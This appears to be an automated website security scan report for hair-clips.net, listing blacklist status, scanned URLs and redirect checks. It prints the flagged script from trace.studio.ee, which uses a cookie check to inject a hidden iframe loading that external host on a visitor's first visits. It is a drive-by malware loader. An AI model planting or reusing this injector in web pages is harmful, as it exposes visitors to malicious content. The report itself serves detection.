Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hair-clips.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hair-clips.net/ | HTTP/1.1 200 OK Connection: close Date: Fri, 29 Aug 2014 22:58:25 GMT Server: LiteSpeed Content-Length: 255 Content-Type: text/html X-Powered-By: PHP/5.3.27 | clean |
http://www.riviera-collection.com/ | 200 OK Content-Length: 15779 Content-Type: text/html | clean |
http://www.riviera-collection.com/common/jquery.js | 200 OK Content-Length: 84007 Content-Type: application/javascript | clean |
http://hair-clips.net/common/base.js | 404 Not Found Content-Length: 1149 Content-Type: text/html | clean |
http://hair-clips.net/test404page.js | 404 Not Found Content-Length: 1149 Content-Type: text/html | clean |
http://hair-clips.net//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 1149 Content-Type: text/html | clean |
http://trace.studio.ee/tracer.js | 200 OK Content-Length: 958 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function setC(cname, value, exdays){ var exdate = new Date(); exdate.setDate(exdate.getDate() + exdays); var c_value = value + ((exdays == null) ? "" : "; expires = " + exdate.toUTCString()); document.cookie = cname + "=" + c_value; } function getC(cname){ var i,x,y,ARRcookies = document.cookie.split(";"); for (i = 0;i<ARRcookies.length;i++){ x = ARRcookies[i].substr(0,ARRcookies[i].indexOf("=")); y = ARRcookies[i].substr(ARRcookies[i].indexOf } } function checkC(){ var visit = getC("visit"); if(getC("visit") == null || visit == "") visit = 1; else visit = parseFloat(visit) + 1; if(visit <= 2){ document.write('<iframe src="http://trace.studio.ee/?referrer='+window.location.hostname+'" width="0" height="0" frameborder="0" style="border:0;height:0;width:0;overflow:hidden;position:absolute;top:0;"></iframe>'); setC("visit", visit, 1); } } checkC(); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hair-clips.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Aug 2014 22:58:25 GMT
Server: LiteSpeed
Content-Length: 255
Content-Type: text/html
X-Powered-By: PHP/5.3.27
...255 bytes of data.
GET / HTTP/1.1
Host: hair-clips.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Aug 2014 22:58:25 GMT
Server: LiteSpeed
Content-Length: 255
Content-Type: text/html
X-Powered-By: PHP/5.3.27
...255 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hair-clips.net
Referer: http://www.google.com/search?q=hair-clips.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hair-clips.net
Referer: http://www.google.com/search?q=hair-clips.net
Result:
The result is similar to the first query. There are no suspicious redirects found.